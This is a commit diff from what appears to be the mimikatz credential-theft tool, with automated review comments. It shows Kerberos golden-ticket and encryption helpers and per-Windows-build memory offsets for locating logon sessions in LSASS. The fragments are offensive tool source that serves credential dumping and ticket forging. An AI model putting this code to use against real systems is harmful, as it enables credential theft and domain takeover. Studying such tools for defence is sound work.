Fixed LogonSessionListCount for 8.0/2012 x64 (Yeah, Joe tested on this platform ;))

Benjamin DELPY 2014-05-23 19:22:32 +02:00
parent 58b14945db
commit 029d72bdaf
5 changed files with 10 additions and 8 deletions


@ -336,12 +336,12 @@ NTSTATUS kuhl_m_kerberos_golden(int argc, wchar_t * argv[])
return STATUS_SUCCESS;
}
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID * output, DWORD * outputSize, BOOL encrypt)
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt)
{
NTSTATUS status;
PKERB_ECRYPT pCSystem;
PVOID pContext;
DWORD bufferSize;
//DWORD bufferSize;
status = CDLocateCSystem(eType, &pCSystem);
if(NT_SUCCESS(status))
@ -349,8 +349,8 @@ NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD
status = pCSystem->Initialize(key, keySize, keyUsage, &pContext);
if(NT_SUCCESS(status))
{
bufferSize = encrypt ? (dataSize + pCSystem->Size) : (dataSize /*- pCSystem->Size*/);
if(*output = LocalAlloc(LPTR, bufferSize))
*outputSize = encrypt ? (dataSize + pCSystem->Size) : dataSize;
if(*output = LocalAlloc(LPTR, *outputSize))
{
status = encrypt ? pCSystem->Encrypt(pContext, data, dataSize, *output, outputSize) : pCSystem->Decrypt(pContext, data, dataSize, *output, outputSize);
if(!NT_SUCCESS(status))
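Review bot: The new size computation `*outputSize = encrypt ? (dataSize + pCSystem->Size) : dataSize;` adds two 32-bit values without a range check, so a `dataSize` close to `MAXDWORD` wraps and `LocalAlloc` returns a buffer smaller than the output the call is expected to produce. A guard before the allocation, for example `if(encrypt && (dataSize > MAXDWORD - pCSystem->Size))` returning an error status, closes that. The caller's `*outputSize` is also now written before the allocation is known to have succeeded, so on a failed `LocalAlloc` it stays non-zero while `*output` is NULL; zeroing it on that path would keep the two out-parameters consistent. The function body continues past the end of the hunk, so how `status` is set on the allocation-failure path is not visible here.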


@ -35,4 +35,4 @@ NTSTATUS kuhl_m_kerberos_decode(int argc, wchar_t * argv[]);
wchar_t * kuhl_m_kerberos_generateFileName(const DWORD index, PKERB_TICKET_CACHE_INFO_EX ticket, LPCWSTR ext);
struct _DIRTY_ASN1_SEQUENCE_EASY * kuhl_m_kerberos_golden_data(LPCWSTR username, LPCWSTR domainname, PISID sid, LPCBYTE krbtgt, DWORD userid, PGROUP_MEMBERSHIP groups, DWORD cbGroups);
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID * output, DWORD * outputSize, BOOL encrypt);
NTSTATUS kuhl_m_kerberos_encrypt(ULONG eType, ULONG keyUsage, LPCVOID key, DWORD keySize, LPCVOID data, DWORD dataSize, LPVOID *output, DWORD *outputSize, BOOL encrypt);


@ -34,7 +34,7 @@ typedef struct _USER_SESSION_KEY {
UCHAR data[16];
} USER_SESSION_KEY;
typedef struct _KERB_SID_AND_ATTRIBUTES{
typedef struct _KERB_SID_AND_ATTRIBUTES {
PISID Sid;
DWORD Attributes;
} KERB_SID_AND_ATTRIBUTES, *PKERB_SID_AND_ATTRIBUTES;


@ -314,7 +314,6 @@ NTSTATUS kuhl_m_sekurlsa_enum(PKUHL_M_SEKURLSA_ENUM callback, LPVOID pOptionalDa
if((cLsass.osContext.BuildNumber >= KULL_M_WIN_MIN_BUILD_7) && (cLsass.osContext.BuildNumber < KULL_M_WIN_MIN_BUILD_BLUE) && (kuhl_m_sekurlsa_msv_package.Module.Informations.TimeDateStamp > 0x53480000))
helper++; // yeah, really, I do that =)
securityStruct.hMemory = cLsass.hLsassMem;
securityStruct.address = LogonSessionListCount;


@ -14,7 +14,7 @@ KULL_M_PATCH_GENERIC LsaSrvReferences[] = {
{KULL_M_WIN_BUILD_2K3, {sizeof(PTRN_WIN5_LogonSessionList), PTRN_WIN5_LogonSessionList}, {0, NULL}, {-4, -45}},
{KULL_M_WIN_BUILD_VISTA, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -60}},
{KULL_M_WIN_BUILD_7, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -59}},
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -61}},
{KULL_M_WIN_BUILD_8, {sizeof(PTRN_WIN6_LogonSessionList), PTRN_WIN6_LogonSessionList}, {0, NULL}, {-4, -0}},
{KULL_M_WIN_MIN_BUILD_BLUE, {sizeof(PTRN_WIN81_LogonSessionList), PTRN_WIN81_LogonSessionList}, {0, NULL}, {-4, -53}},
};
#elif defined _M_IX86
@ -37,6 +37,9 @@ PULONG LogonSessionListCount = NULL;
BOOL kuhl_m_sekurlsa_utils_search(PKUHL_M_SEKURLSA_CONTEXT cLsass, PKUHL_M_SEKURLSA_LIB pLib)
{
PVOID *pLogonSessionListCount = (cLsass->osContext.BuildNumber < KULL_M_WIN_BUILD_2K3) ? NULL : ((PVOID *) &LogonSessionListCount);
#ifdef _M_X64
LsaSrvReferences[4].Offsets.off1 = (pLib->Informations.TimeDateStamp > 0x53480000) ? -54 : -61; // 6.2 post or pre KB
#endif
return kuhl_m_sekurlsa_utils_search_generic(cLsass, pLib, LsaSrvReferences, sizeof(LsaSrvReferences) / sizeof(KULL_M_PATCH_GENERIC), (PVOID *) &LogonSessionList, pLogonSessionListCount, NULL);
}
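Review bot: The added override `LsaSrvReferences[4].Offsets.off1 = ...` addresses the table row by a bare index, and the `-0` now stored in the `KULL_M_WIN_BUILD_8` row is a placeholder with no comment saying it is replaced at runtime; inserting or reordering a row would silently patch the wrong entry. The start of the table is outside the hunk, so whether index 4 really is the `KULL_M_WIN_BUILD_8` row cannot be confirmed from here. I would add a comment on that row, `// off1 is filled in by kuhl_m_sekurlsa_utils_search from the module TimeDateStamp`, and replace the literal `4` with a named index or a lookup by build number. The threshold `0x53480000` also appears in the `kuhl_m_sekurlsa_enum` hunk of this commit; a single named macro would keep the two checks in step.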